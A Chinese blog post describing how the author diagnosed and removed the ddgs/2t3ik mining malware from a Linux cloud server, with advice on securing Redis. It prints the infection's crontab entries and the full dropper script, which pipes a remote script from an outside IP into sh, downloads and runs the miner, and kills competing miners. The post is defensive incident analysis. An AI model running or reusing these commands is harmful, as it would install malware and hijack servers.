2t3ik与ddgs挖矿病毒处理

xialluyouyue

浏览: 165743 次
性别:
来自: 南京

最近访客更多访客>>

bisgoon

lzhfsailor

pulading1988

u012363178

博主相关

博客

微博

相册

留言

关于我

文章分类

社区版块

存档分类

博客分类：

linux成长记录

一、问题现象
朋友的阿里云LINUX服务器，发现有2t3ik与ddgs两个异常进程，把CPU几乎耗尽了。其描述kill掉以后，过一会儿又会重新出现。

2t3ik_worm

二、分析处理
即然kill 后过一会儿又会出现，那就有两种可能：1、crontab定时调用；2、有守护进程，个别病毒还会修改ps和top，通过这些命令无法查看到隐藏的守护进程。先看了下crontab，发现如下两条内容：

*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh
*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh
查询了下165.225.157.157这个IP来自美国拉斯维加斯。获取了下i.sh脚本，发现内容如下：

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
if [ ! -f "/tmp/ddgs.3011" ]; then
curl -fsSL http://165.225.157.157:8000/static/3011/ddgs.i686 -o /tmp/ddgs.3011
fi
chmod +x /tmp/ddgs.3011 && /tmp/ddgs.3011
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
简单的一个shell 脚本，前面是创建crontab定时任务，后面下面了ddgs.i686程序并执行。可以确定就是这个来自美国的国际友人的程序干的坏事了。

删除crontab内容，并kill 掉相关进程后，观察一段时间发现其不再重新出现。问题解决。当然，为避免其后面再出现，可以做以下预防操作：

cd /tmp/
rm -rf 2t3ik.p
rm -rf ddgs.3011
touch 2t3ik.p
touch ddgs.3011
chattr +i 2t3ik*
chattr +i ddgs*
三、产生原因
网上也找了下该病毒的相关信息，了解到其一般是由于安装了redis后，未设置密码或密码太过简单，导致的被入侵。redis密码修改方法如下：

redis-cli -h 127.0.0.1 -p 6379
config get requirepass //获取当前密码
config set requirepass "yourpassword"//设置当前密码,服务重新启动后又会置为默认，即无密码；
永久生效方法为，打开redis配置文件redis.conf，找到requirepass值修改密码，如下：

requirepass yourpassword //此处注意，行前不能有空格
另外，平时还是建议安装chkrootkit、rkhunter、Lynis、ISPProtect这类安全工具，定期做扫描。

分享到：

angular2 ng2 @input和@output理解 | PHP消息队列实现及应用

2018-06-01 14:43
浏览 925
评论(0)
分类:操作系统
查看更多

发表评论

您还没有登录,请您登录后再发表评论

最近访客更多访客>>

博主相关

文章分类

社区版块

存档分类

最新评论